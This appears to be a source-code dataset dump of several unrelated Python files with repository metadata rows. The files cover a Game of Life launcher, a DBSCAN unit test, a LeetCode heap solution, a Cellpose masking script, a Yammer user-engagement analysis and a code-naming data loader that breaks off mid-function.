argument_parser = ArgumentParser(description="""
Game of Life:
- Little python implementation of Conway's game of life.
- The game board will be visualized with matplotlib.
    - See readme.md for more information.""",
epilog="https://github.com/WinterWonderland/Game_of_Life",
formatter_class=RawTextHelpFormatter)
argument_parser.add_argument("--width",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--height",
metavar="",
type=int,
default=100,
help="The width of the game board (default=100)")
argument_parser.add_argument("--interval",
metavar="",
type=float,
default=0.3,
help="Interval time between each step (default=0.3)")
argument_parser.add_argument("--seed",
metavar="",
type=int,
default=None,
help="A seed for the random number generator to get identical play boards")
args = argument_parser.parse_args()
GameOfLife(width=args.width,
height=args.height,
interval=args.interval,
seed=args.seed).run()
input("press enter to quit")
41.64486 | 123 | 0.47711 | 521 | 4,456 | 4.001919 | 0.264875 | 0.069065 | 0.052758 | 0.031655 | 0.326139 | 0.306954 | 0.306954 | 0.235971 | 0.235971 | 0.228777 | 0 | 0.034879 | 0.414497 | 4,456 | 106 | 124 | 42.037736 | 0.764278 | 0.016607 | 0 | 0.154762 | 0 | 0 | 0.114808 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.059524 | 0 | 0.142857 | 0.011905 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a820c01ed9ab1a3512b23d858002b832b81b6f26 | 506 | py | Python
examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | ["Apache-2.0"] | 6 | 2021-02-09T22:27:55.000Z | 2022-01-14T18:15:17.000Z
examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | ["Apache-2.0"] | 34 | 2021-02-09T22:23:33.000Z | 2022-03-31T16:22:51.000Z
examples/snippets/data_io/df_connect/export_simple.py | nguyentr17/tamr-toolbox | 1d27101eda12f937813cdbfe27e2fa9c33ac34d2 | ["Apache-2.0"] | 12 | 2021-02-09T21:17:10.000Z | 2022-02-09T16:35:39.000Z
"""
Export data from Tamr using df-connect. An example where everything is default in config file,
which implies exported data is written back to same database as ingested from.
"""
import tamr_toolbox as tbox
my_config = tbox.utils.config.from_yaml("examples/resources/conf/connect.config.yaml")
my_connect = tbox.data_io.df_connect.client.from_config(my_config)
tbox.data_io.df_connect.client.export_dataset(
my_connect, dataset_name="example_dataset", target_table_name="example_target_table",
)
36.142857 | 94 | 0.8083 | 79 | 506 | 4.949367 | 0.518987 | 0.069054 | 0.061381 | 0.061381 | 0.127877 | 0.127877 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102767 | 506 | 13 | 95 | 38.923077 | 0.861233 | 0.341897 | 0 | 0 | 0 | 0 | 0.24 | 0.132308 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a8247bed0a1cb5051fa0d35c0fab64fca16aa20d | 1,396 | py | Python
python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | ["Apache-2.0"] | null | null | null
python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | ["Apache-2.0"] | null | null | null
python/cuML/test/test_dbscan.py | rongou/cuml | 9fbd7187ccf7ee7457c55b768ebd8ea86dbe2bec | ["Apache-2.0"] | null | null | null
# Copyright (c) 2018, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from cuml import DBSCAN as cuDBSCAN
from sklearn.cluster import DBSCAN as skDBSCAN
from test_utils import array_equal
import cudf
import numpy as np
@pytest.mark.parametrize('datatype', [np.float32, np.float64])
def test_dbscan_predict(datatype):
gdf = cudf.DataFrame()
    gdf['0'] = np.asarray([1, 2, 2, 8, 8, 25], dtype=datatype)
    gdf['1'] = np.asarray([2, 2, 3, 7, 8, 80], dtype=datatype)
    X = np.array([[1, 2], [2, 2], [2, 3], [8, 7], [8, 8], [25, 80]], dtype=datatype)
    print("Calling fit_predict")
    cudbscan = cuDBSCAN(eps=3, min_samples=2)
    cu_labels = cudbscan.fit_predict(gdf)
    skdbscan = skDBSCAN(eps=3, min_samples=2)
sk_labels = skdbscan.fit_predict(X)
print(X.shape[0])
for i in range(X.shape[0]):
assert cu_labels[i] == sk_labels[i]
32.465116 | 86 | 0.703438 | 223 | 1,396 | 4.345291 | 0.497758 | 0.06192 | 0.026832 | 0.033024 | 0.03096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041703 | 0.175501 | 1,396 | 42 | 87 | 33.238095 | 0.800174 | 0.401862 | 0 | 0 | 0 | 0 | 0.035452 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0 | 0.3 | 0 | 0.35 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a8276b0d3215a9fe2604eec700ad87c77dc2f29b | 769 | py | Python
LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | ["MIT"] | 1 | 2020-05-13T19:16:23.000Z | 2020-05-13T19:16:23.000Z
LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | ["MIT"] | null | null | null
LeetCode/0023_merge_k_sorted_lists.py | KanegaeGabriel/ye-olde-interview-prep-grind | 868362872523a5688f49ab48efb09c3008e0db4d | ["MIT"] | null | null | null
from heapq import heappush, heappop
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
def __lt__(self, other):
return self.val < other.val
def mergeKLists(lists):
result = ListNode(-1)
p = result
heap = []
for l in lists:
if l: heappush(heap, l)
while heap:
cur = heappop(heap)
if cur.next: heappush(heap, cur.next)
p.next = cur
p = p.next
return result.next
l1 = ListNode(1)
l1.next = ListNode(4)
l1.next.next = ListNode(5)
l2 = ListNode(1)
l2.next = ListNode(3)
l2.next.next = ListNode(4)
l3 = ListNode(2)
l3.next = ListNode(6)
l3 = mergeKLists([l1, l2, l3])
p = l3
while p:
print(p.val, end=" ") # 1 1 2 3 4 4 5 6
p = p.next
print()
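# Added sketch (not part of the original solution): for plain value streams,
# heapq.merge performs the same O(N log k) k-way merge without a hand-rolled
# heap. Helper and variable names here are hypothetical.
from heapq import merge

def iter_vals(node):
    while node:
        yield node.val
        node = node.next

a = ListNode(1); a.next = ListNode(4); a.next.next = ListNode(5)
b = ListNode(1); b.next = ListNode(3); b.next.next = ListNode(4)
print(list(merge(iter_vals(a), iter_vals(b))))  # [1, 1, 3, 4, 4, 5]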
17.477273 | 45 | 0.579974 | 121 | 769 | 3.619835 | 0.322314 | 0.136986 | 0.027397 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054945 | 0.289987 | 769 | 44 | 46 | 17.477273 | 0.747253 | 0.019506 | 0 | 0.060606 | 0 | 0 | 0.001328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.030303 | 0.030303 | 0.212121 | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a82a766dd5a8919e5aec354cbe63b71c9cd59549 | 2,297 | py | Python
source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | ["MIT"] | 1 | 2021-07-09T11:51:04.000Z | 2021-07-09T11:51:04.000Z
source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | ["MIT"] | null | null | null
source/cell_mask/cell_mask.py | zhanyinx/SPT_analysis | 1cf806c1fd6051e7fc998d2860a16bea6aa9de1a | ["MIT"] | null | null | null
import argparse
import glob
import numpy as np
import os
import skimage.io
import torch
import tifffile
from cellpose import models
def _parse_args():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--input",
type=str,
default=None,
required=True,
help="Input image or folder with images to mask.",
)
parser.add_argument(
"-o",
"--output",
type=str,
default=None,
required=False,
help="Output folder, default mask within input folder",
)
parser.add_argument(
"-t",
"--target",
type=str,
default=None,
required=False,
help="Target channel tag, if provided, it will look for files with the tag.",
)
args = parser.parse_args()
return args
def main():
"""Create cell masks and save them into mask folder within input folder."""
args = _parse_args()
if os.path.isdir(args.input):
inputs = glob.glob(f"{args.input}/*tif")
elif os.path.isfile(args.input):
inputs = [args.input]
else:
raise ValueError(f"Expected input folder or file. Provided {args.input}.")
if args.target is not None:
inputs = [x for x in inputs if args.target in x]
output = args.output
if output is None:
output = f"{os.path.abspath(args.input)}/mask"
if not os.path.exists(output):
os.mkdir(output)
cellpose_model = models.Cellpose(model_type="cyto", gpu=False)
for input_file in inputs:
img = skimage.io.imread(input_file)
middle_slice = len(img) // 2
if len(img.shape) == 4:
mask_nucl, *_ = cellpose_model.eval(
[np.max(img, axis=1)[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
if len(img.shape) == 3:
mask_nucl, *_ = cellpose_model.eval(
[img[middle_slice]],
diameter=150,
channels=[0, 0],
min_size=15,
)
name = os.path.basename(input_file)
out = f"{output}/{name}"
tifffile.imsave(out, mask_nucl[0])
if __name__ == "__main__":
main()
25.241758 | 85 | 0.562908 | 284 | 2,297 | 4.43662 | 0.394366 | 0.042857 | 0.040476 | 0.042857 | 0.180952 | 0.120635 | 0.120635 | 0.065079 | 0.065079 | 0.065079 | 0 | 0.012141 | 0.318677 | 2,297 | 90 | 86 | 25.522222 | 0.792971 | 0.0431 | 0 | 0.256757 | 0 | 0 | 0.145405 | 0.015546 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0 | 0.108108 | 0 | 0.148649 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a82b6067d87e3c320c8e0fb55b9b998dccade592 | 14,134 | py | Python
02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | ["MIT"] | null | null | null
02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | ["MIT"] | 1 | 2021-06-08T02:43:08.000Z | 2021-06-08T03:05:21.000Z
02-customer-cliff-dive/python/emery_leslie.py | leslem/insight-data-challenges | 14c56d30663d7fef178b820d2128dbf4782c1200 | ["MIT"] | null | null | null
# # Customer cliff dive data challenge
# 2020-02-17
# Leslie Emery
# ## Summary
# ### The problem
# The head of the Yammer product team has noticed a precipitous drop in weekly active users, which is one of the main KPIs for customer engagement. What has caused this drop?
# ### My approach and results
# I began by coming up with several questions to investigate:
# - Was there any change in the way that weekly active users is calculated?
# - This does not appear to be the case. To investigate this, I began by replicating the figure from the dashboard. I calculated a rolling 7-day count of engaged users, making sure to use the same method across the entire time frame covered by the dataset, and it still showed the same drop in engagement.
# - Was there a change in any one particular type of "engagement"?
# - I looked at a rolling 7-day count of each individual type of engagement action. From plotting all of these subplots, it looks to me like home_page, like_message, login, send_message, and view_inbox are all exhibiting a similar drop around the same time, so it's these underlying events that are driving the drop.
# - Could a change in the user interface be making it more difficult or less pleasant for users?
# - I couldn't find information in the available datasets to address this question. The `yammer_experiments` data set has information about experiments going on, presumably in the user interface. All of the listed experiments happened in June of 2014, though, which I think is too early to have caused the August drop in engagement.
# - Is this drop a seasonal change that happens around this time every year?
# - Because the data is only available for the period of time shown in the original dashboard, I can't investigate this question. I'd be very interested to see if there is a pattern of reduced engagement at the end of the summer, perhaps related to vacation or school schedules.
# - Are users visiting the site less because they're getting more content via email?
# - I calculated 7-day rolling counts of each type of email event, and all email events together. Email events overall went up during the time period immediately before the drop in user engagement. All four types of email events increased during the same period, indicating higher clickthroughs on emails, higher numbers of email open events, and more reengagement and weekly digest emails sent. It could be that the higher number of weekly digests sent out mean that users don't have to visit the site directly as much.
# - Are users disengaging from the site due to too many emails/notifications?
# - I calculated a rolling 7-day count of emails sent to each user and found that the number of emails sent to each user per 7-day period has increased from 5.4 emails (July 20) to 7.75 emails (August 11). This suggests that an increasing volume of emails sent to individual users could have driven them away from using the site. To investigate this further I would want to look into email unsubscribe rates. If unsubscribe rates have also gone up, then it seems that Yammer is sending too many emails to its users.
# - To investigate whether the number of emails sent per user is correlated with the number of engaged users, I used a Granger causality test to see if "emails sent per user" could be used to predict "number of engaged users". With a high enough lag, the test statistics might be starting to become significant, but I would want to investigate these test results further before making any recommendations based on them.
# - Is the drop in engagement due to a decrease in new activated users? e.g. they are reaching the end of potential customer base?
# - I calculated the cumulative number of newly activated users over time, using the activation time for each user in the users table. I wanted to see if customer growth had leveled off. However, I saw that customer growth was still increasing in the same pattern. This was true when using creation date rather than activation date as well.
# What is my recommendation to Yammer?
# I have a few recommendations to Yammer:
# - Try decreasing the number of emails sent to each individual user to see if this increases engagement. They could try this for a subset of users first.
# - Investigate email unsubscribe rates to see if they are going up. This would indicate that increased email volume might be making users unhappy.
# - Compare this data to a wider time range to see if the drop shown here is seasonal.
# +
import matplotlib.pyplot as plt
import numpy as np
import os
import plotly.express as px
import pandas as pd
from scipy import stats
from statsmodels.tsa.stattools import acf, pacf
from statsmodels.graphics.tsaplots import plot_acf, plot_pacf
from statsmodels.tsa.stattools import grangercausalitytests
# -
data_dir = '/Users/leslie/devel/insight-data-challenges/02-customer-cliff-dive/data'
benn_normal = pd.read_csv(os.path.join(data_dir, 'benn.normal_distribution - benn.normal_distribution.csv.tsv'), sep='\t')
rollup_periods = pd.read_csv(os.path.join(data_dir, 'dimension_rollup_periods - dimension_rollup_periods.csv.tsv'), sep='\t',
parse_dates=['time_id', 'pst_start', 'pst_end', 'utc_start', 'utc_end'])
yammer_emails = pd.read_csv(os.path.join(data_dir, 'yammer_emails - yammer_emails.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_events = pd.read_csv(os.path.join(data_dir, 'yammer_events - yammer_events.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_experiments = pd.read_csv(os.path.join(data_dir, 'yammer_experiments - yammer_experiments.csv.tsv'), sep='\t',
parse_dates=['occurred_at'])
yammer_users = pd.read_csv(os.path.join(data_dir, 'yammer_users - yammer_users.csv.tsv'), sep='\t',
parse_dates=['created_at', 'activated_at'])
# +
benn_normal.info()
benn_normal.head()
benn_normal.describe()
rollup_periods.info()
rollup_periods.head()
rollup_periods.describe()
yammer_emails.info()
yammer_emails.head()
yammer_emails.describe()
yammer_emails['action'].value_counts(dropna=False)
yammer_emails['user_type'].value_counts(dropna=False)
yammer_events.info()
yammer_events.head()
yammer_events.describe()
yammer_events['occurred_at']
yammer_events['event_type'].value_counts(dropna=False)
yammer_events['event_name'].value_counts(dropna=False)
yammer_events['location'].value_counts(dropna=False)
yammer_events['device'].value_counts(dropna=False)
yammer_events['user_type'].value_counts(dropna=False)
yammer_events['user_type'].dtype
# user_type should be an int, but has many missing values, and NaN is a float.
# So convert it to the Pandas Int64 dtype which can accommodate NaNs and ints.
yammer_events = yammer_events.astype({'user_type': 'Int64'})
yammer_experiments.info()
yammer_experiments.head()
yammer_experiments.describe()
yammer_experiments['experiment'].value_counts(dropna=False)
yammer_experiments['experiment_group'].value_counts(dropna=False)
yammer_experiments['location'].value_counts(dropna=False)
yammer_experiments['device'].value_counts(dropna=False)
yammer_users.info()
yammer_users.head()
yammer_users.describe()
yammer_users['language'].value_counts(dropna=False)
yammer_users['state'].value_counts(dropna=False)
yammer_users['company_id'].value_counts(dropna=False)
# -
# ## Initial data investigation
# +
# How many days in the dataset?
yammer_events['occurred_at'].max() - yammer_events['occurred_at'].min()
# 122 days!
rollup_periods['pst_start'].max() - rollup_periods['pst_end'].min()
# 1094 days - way more intervals than needed to tile this events data!
yammer_events = yammer_events.sort_values(by='occurred_at', ascending=True)
small_events = yammer_events.head(int(yammer_events.shape[0]/10)).sample(n=40)
small_events = small_events.sort_values(by='occurred_at', ascending=True)
small_events['occurred_at'].max() - small_events['occurred_at'].min()
weekly_rollup_periods = rollup_periods.loc[rollup_periods['period_id'] == 1007]
# -
# +
small_rolling_engagement = small_events.loc[small_events['event_type'] == 'engagement'].rolling(
'7D', on='occurred_at').count()
# I'm not sure whether rollup_periods are closed on right, left, or both...
# Calculate counts of engagement events in a 7-day rolling window
rolling_engagement_counts = yammer_events.loc[yammer_events['event_type'] == 'engagement'].sort_values(
by='occurred_at', ascending=True # Have to sort by "on" column to use rolling()
).rolling('7D', on='occurred_at', min_periods=1).count()
# +
# Use a loop to aggregate on rollup periods
yammer_events['event_name'].unique()
event_range = [min(yammer_events['occurred_at']), max(yammer_events['occurred_at'])]
covered_weekly_rollup_periods = weekly_rollup_periods.loc[(weekly_rollup_periods['pst_end'] <= event_range[1])
& (weekly_rollup_periods['pst_start'] >= event_range[0])]
# in interval --> start < occurred_at <= end
counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
    # Get engagement events within the period
df = yammer_events.loc[(yammer_events['occurred_at'] > row['pst_start'])
& (yammer_events['occurred_at'] <= row['pst_end'])
& (yammer_events['event_type'] == 'engagement')]
# Count user engagement events
cbt = df.groupby('event_name').aggregate(event_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['engaged_users'] = df['user_id'].nunique()
cbt['engagement_event_count'] = df.shape[0]
if counts_by_type is None:
counts_by_type = cbt
else:
counts_by_type = counts_by_type.append(cbt)
counts_by_type
# +
# Plot engaged users over time
fig = px.scatter(counts_by_type, x='pst_end', y='engaged_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of engagement_events over time
fig = px.scatter(counts_by_type, x='pst_end', y='engagement_event_count', template='plotly_white')
fig.show()
# Plot count of individual event types over time
counts_melted = counts_by_type.melt(id_vars=['pst_start', 'pst_end', 'engaged_users', 'engagement_event_count'])
fig = px.scatter(counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='event_name', facet_col_wrap=3, height=1200)
fig.update_yaxes(matches=None)
fig.show()
# -
# Are there any "experiments" messing things up?
yammer_experiments['occurred_at'].describe()
# No, these are all before the issue shows up
# +
# Investigate the sending of emails to user in the same rollup periods
email_counts_by_type = None
for (ridx, row) in covered_weekly_rollup_periods.iterrows():
# row = covered_weekly_rollup_periods.iloc[0]
    # Get engagement events within the period
    df = yammer_emails.loc[(yammer_emails['occurred_at'] > row['pst_start'])
                           & (yammer_emails['occurred_at'] <= row['pst_end'])]
# Count user engagement events
cbt = df.groupby('action').aggregate(action_count=('user_id', 'count')).transpose()
cbt['pst_start'] = row['pst_start']
cbt['pst_end'] = row['pst_end']
cbt['emailed_users'] = df['user_id'].nunique()
cbt['email_event_count'] = df.shape[0]
cbt['emails_sent_per_user'] = df.loc[df['action'].str.startswith('sent_')].groupby(
'user_id').count().mean()['user_type']
if email_counts_by_type is None:
email_counts_by_type = cbt
else:
email_counts_by_type = email_counts_by_type.append(cbt)
email_counts_by_type
# +
# Plot emailed users over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='emailed_users', template='plotly_white')
fig.update_yaxes(range=[0, 1500])
fig.show()
# Plot count of email events over time
fig = px.scatter(email_counts_by_type, x='pst_end', y='email_event_count', template='plotly_white')
fig.show()
# Plot count of individual email types over time
email_counts_melted = email_counts_by_type.melt(id_vars=[
'pst_start', 'pst_end', 'emailed_users', 'email_event_count', 'emails_sent_per_user'])
fig = px.scatter(email_counts_melted, x='pst_end', y='value', template='plotly_white',
facet_col='action', facet_col_wrap=2)
fig.update_yaxes(matches=None)
fig.show()
# -
# +
# What is email engagement event count per user? Did that increase?
# +
fig = px.scatter(email_counts_by_type, x='pst_start', y='emails_sent_per_user', template='plotly_white')
fig.show()
r, p = stats.pearsonr(email_counts_by_type['emails_sent_per_user'].to_numpy(),
                      counts_by_type['engaged_users'].to_numpy())
# They do look moderately correlated, but how do I test that one has an effect on the other?
# -
acf_50 = acf(counts_by_type['engaged_users'], nlags=50, fft=True)
pacf_50 = pacf(counts_by_type['engaged_users'], nlags=50)
fig, axes = plt.subplots(1, 2, figsize=(16, 3), dpi=200)
plot_acf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[0])
plot_pacf(counts_by_type['engaged_users'].tolist(), lags=50, ax=axes[1])
plt.show()
test_df = pd.DataFrame({'emails_sent_per_user': email_counts_by_type['emails_sent_per_user'].to_numpy(),
'engaged_users': counts_by_type['engaged_users'].to_numpy()})
lags = range(1, 21)  # grangercausalitytests requires positive lags
caus_test = grangercausalitytests(test_df, maxlag=lags)
# Has there been a dropoff in new users?
# +
yammer_users = yammer_users.sort_values(by='created_at', ascending=True)
yammer_users['cumulative_users'] = np.arange(1, yammer_users.shape[0] + 1)  # positional assignment avoids index realignment after sort_values
fig = px.scatter(yammer_users, x='created_at', y='cumulative_users', template='plotly_white')
fig.show()
# Nope, growth is still practically exponential
yammer_users = yammer_users.sort_values(by='activated_at', ascending=True)
yammer_users['cumulative_activated_users'] = np.arange(1, yammer_users.shape[0] + 1)
fig = px.scatter(yammer_users, x='activated_at', y='cumulative_activated_users', template='plotly_white')
fig.show()
yammer_users['company_id'].nunique()
# -
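# +
# Added sketch (not in the original analysis): extract the ssr F-test p-values
# from the grangercausalitytests result, which maps each tested lag to a
# (test-results dict, fitted-models list) pair in statsmodels.
granger_pvals = {lag: res[0]['ssr_ftest'][1] for lag, res in caus_test.items()}
print(sorted(granger_pvals.items()))
# -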
51.963235 | 524 | 0.743809 | 2,168 | 14,134 | 4.660978 | 0.223247 | 0.038001 | 0.032063 | 0.03048 | 0.35052 | 0.307472 | 0.254132 | 0.215636 | 0.192083 | 0.15616 | 0 | 0.008326 | 0.150276 | 14,134 | 271 | 525 | 52.154982 | 0.833056 | 0.417787 | 0 | 0.163265 | 0 | 0.006803 | 0.22371 | 0.045332 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.061224 | 0 | 0.061224 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0
a82c200cd117a48cc9a2ebacd146f50b56baabcf | 23,587 | py | Python
convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | ["BSD-3-Clause"] | 128 | 2016-05-10T01:38:27.000Z | 2022-02-04T07:14:12.000Z
convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | ["BSD-3-Clause"] | 6 | 2016-07-19T09:27:47.000Z | 2021-07-08T21:22:32.000Z
convolutional_attention/token_naming_data.py | s1530129650/convolutional-attention | 8839da8146962879bb419a61253e7cf1b684fb22 | ["BSD-3-Clause"] | 36 | 2016-05-11T08:57:26.000Z | 2021-07-07T02:37:07.000Z
from collections import defaultdict
import heapq
from itertools import chain, repeat
from feature_dict import FeatureDictionary
import json
import numpy as np
import scipy.sparse as sp
class TokenCodeNamingData:
SUBTOKEN_START = "%START%"
SUBTOKEN_END = "%END%"
NONE = "%NONE%"
@staticmethod
def __get_file_data(input_file):
with open(input_file, 'r') as f:
data = json.load(f)
# data=[{"tokens":"hello world I am OK".split(),"name":"hello world you".split()}]*4
# data+=[{"tokens":"just another test of a silly program".split(),"name":"who knows".split()}]*4
names = []
original_names = []
code = []
for entry in data:
# skip entries with no relevant data (this will crash the code)
if len(entry["tokens"]) == 0 or len(entry["name"]) == 0:
continue
code.append(TokenCodeNamingData.remove_identifiers_markers(entry["tokens"]))
original_names.append(",".join(entry["name"]))
subtokens = entry["name"]
names.append([TokenCodeNamingData.SUBTOKEN_START] + subtokens + [TokenCodeNamingData.SUBTOKEN_END])
return names, code, original_names
def __init__(self, names, code):
self.name_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(names), 2)
self.name_dictionary.add_or_get_id(self.NONE)
self.all_tokens_dictionary = FeatureDictionary.get_feature_dictionary_for(chain.from_iterable(
[chain.from_iterable(code), chain.from_iterable(names)]), 5)
self.all_tokens_dictionary.add_or_get_id(self.NONE)
self.name_empirical_dist = self.__get_empirical_distribution(self.all_tokens_dictionary, chain.from_iterable(names))
@staticmethod
def __get_empirical_distribution(element_dict, elements, dirichlet_alpha=10.):
"""
        Retrieve the empirical distribution of tokens
:param element_dict: a dictionary that can convert the elements to their respective ids.
:param elements: an iterable of all the elements
:return:
"""
targets = np.array([element_dict.get_id_or_unk(t) for t in elements])
empirical_distribution = np.bincount(targets, minlength=len(element_dict)).astype(float)
empirical_distribution += dirichlet_alpha / len(empirical_distribution)
return empirical_distribution / (np.sum(empirical_distribution) + dirichlet_alpha)
def __get_in_lbl_format(self, data, dictionary, cx_size):
targets = []
contexts = []
ids = []
for i, sequence in enumerate(data):
for j in xrange(1, len(sequence)): # First element should always be predictable (ie sentence start)
ids.append(i)
targets.append(dictionary.get_id_or_unk(sequence[j]))
context = sequence[:j]
if len(context) < cx_size:
context = [self.NONE] * (cx_size - len(context)) + context
else:
context = context[-cx_size:]
assert len(context) == cx_size, (len(context), cx_size,)
contexts.append([dictionary.get_id_or_unk(t) for t in context])
return np.array(targets, dtype=np.int32), np.array(contexts, dtype=np.int32), np.array(ids, np.int32)
def get_data_in_lbl_format(self, input_file, code_cx_size, names_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_in_lbl_format(names, self.name_dictionary, names_cx_size), \
self.__get_in_lbl_format(code, self.all_tokens_dictionary, code_cx_size), original_names
@staticmethod
def get_data_in_lbl_format_with_validation(input_file, code_cx_size, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_in_lbl_format(names[:lim], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[:lim], naming.all_tokens_dictionary, code_cx_size), original_names[:lim], \
naming.__get_in_lbl_format(names[lim:], naming.name_dictionary, names_cx_size), \
naming.__get_in_lbl_format(code[lim:], naming.all_tokens_dictionary, code_cx_size), original_names[lim:], naming
@staticmethod
def get_data_in_forward_format_with_validation(input_file, names_cx_size, pct_train):
assert pct_train < 1
assert pct_train > 0
names, code, original_names = TokenCodeNamingData.__get_file_data(input_file)
names = np.array(names, dtype=np.object)
code = np.array(code, dtype=np.object)
original_names = np.array(original_names, dtype=np.object)
lim = int(pct_train * len(names))
naming = TokenCodeNamingData(names[:lim], code[:lim])
return naming.__get_data_in_forward_format(names[:lim], code[:lim], names_cx_size),\
naming.__get_data_in_forward_format(names[lim:], code[lim:], names_cx_size), naming
def get_data_in_forward_format(self, input_file, name_cx_size):
names, code, original_names = self.__get_file_data(input_file)
return self.__get_data_in_forward_format(names, code, name_cx_size), original_names
def __get_data_in_forward_format(self, names, code, name_cx_size):
"""
Get the data in a "forward" model format.
:param data:
:param name_cx_size:
:return:
"""
assert len(names) == len(code), (len(names), len(code), code.shape)
# Keep only identifiers in code
#code = self.keep_identifiers_only(code)
name_targets = []
name_contexts = []
original_names_ids = []
id_xs = []
id_ys = []
k = 0
for i, name in enumerate(names):
for j in xrange(1, len(name)): # First element should always be predictable (ie sentence start)
name_targets.append(self.name_dictionary.get_id_or_unk(name[j]))
original_names_ids.append(i)
context = name[:j]
if len(context) < name_cx_size:
context = [self.NONE] * (name_cx_size - len(context)) + context
else:
context = context[-name_cx_size:]
assert len(context) == name_cx_size, (len(context), name_cx_size,)
